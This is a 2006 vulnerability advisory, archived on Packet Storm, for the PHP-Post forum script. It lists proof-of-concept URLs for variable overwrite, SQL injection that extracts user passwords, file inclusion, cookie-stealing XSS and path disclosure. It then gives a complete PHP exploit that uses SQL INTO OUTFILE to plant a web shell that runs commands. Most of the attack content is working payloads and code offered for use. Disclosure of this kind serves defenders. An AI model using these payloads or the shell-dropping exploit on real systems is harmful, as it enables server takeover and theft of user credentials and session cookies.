exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHP-Post.txt

PHP-Post.txt
Posted Oct 9, 2006
Authored by HACKERS PAL | Site soqor.net

PHP-Post suffers from multiple input validation vulnerabilities.

tags | advisory, php, vulnerability
SHA-256 | 20323cc7139975eeb177172778044c5303cf3f0bb4523ffbeb10f9a9ceea6aaa

PHP-Post.txt

Change Mirror Download
Hello,,

PHP-Post Multiple Input Validation Vulnerabilities

Discovered By : HACKERS PAL
Copy rights : HACKERS PAL
Website : http://www.soqor.net
Email Address : security@soqor.net


variables over write,,

this php script is injected with variables over write bug
try to make a new variable with the name of any exist variable and it will over write it :)

example
index.php?table_prefix=myprefix:)
profile.php?table_prefix=myprefix:)%20where%201=1/*
header.php?msgid=w&table_prefix=myprefix:)

Sql
profile.php?user='%20union%20select%20usernumber,7,7,username,7,7,7,7,7,7,username,7,userpassword,7,7,7,7,7,7,7,7%20from%20phpp_users%20where%20usernumber=1/*


Include

footer.php?template=22

Xss

pm.php?s=o&replyuser="><script>alert(document.cookie);</script><"
dropdown.php?txt_jumpto="><script>alert(document.cookie);</script><"

template.php?txt_error=<script>alert(document.cookie);</script>
template.php?txt_templatenotexist=<script>alert(document.cookie);</script>

add split to any link like
editprofile.php?split=<script>alert(document.cookie);</script>
search.php?split=<script>alert(document.cookie);</script>
index.php?split=<script>alert(document.cookie);</script>
pm.php?s=i&split=<script>alert(document.cookie);</script>

all the files are injected


if logged in
loginline.php?txt_logout=<script>alert(document.cookie);</script>
if not
loginline.php?txt_login=<script>alert(document.cookie);</script>

Full path
footer.php?template=22

template.php?template=red&logincookie[user]=ddddd

template.php?template=red

lastvisit.php?


Exploit for sql injection:-
Make phpshell named soqor.php in the forum dir

#!/usr/bin/php -q -d short_open_tag=on
<?
/*
/* PhP-post Sql injection Remote Command execution Exploit
/* By : HACKERS PAL
/* WwW.SoQoR.NeT
*/
print_r('
/***********************************************/
/* PHP-post remote sql injection make phpshell */
/* by HACKERS PAL <security@soqor.net> */
/* site: http://www.soqor.net */');
if ($argc<2) {
print_r('
/* -- */
[-] Usage: php '.$argv[0].' host
[-] Example:
[-] php '.$argv[0].' http://localhost/phpp
/***********************************************/
');
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$url=$argv[1];
$exploit1="/footer.php?template=11hack11";

Function get_page($url)
{

if(function_exists("file_get_contents"))
{

$contents = file_get_contents($url);

}
else
{
$fp=fopen("$url","r");
while($line=fread($fp,1024))
{
$contents=$contents.$line;
}


}
return $contents;
}

$page = get_page($url.$exploit1);

$pa=explode("<b>",$page);
$pa=explode("</b>",$pa[2]);
$path = str_replace("footer.php","",$pa[0])."soqor.php";
$var='\ ';
$var = str_replace(" ","",$var);
$path = str_replace($var,"/",$path);
$exploit2="/profile.php?user='%20union%20select%201,'<?php%20','system(','".'$_GET[cmd]'."',');','die();','?>',8,9,10,11,12,13,14,15,16,17,18,19,20,21%20INTO%20OUTFILE%20'$path'%20from%20phpp_users/*";
$page_now = get_page($url.$exploit2);
Echo "\n[+] Go TO $url/soqor.php?cmd=id\n[+] Change id to any command you want :)";
Die("\n/* Visit us : WwW.SoQoR.NeT */\n/***********************************************/");

?>

WwW.SoQoR.NeT
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close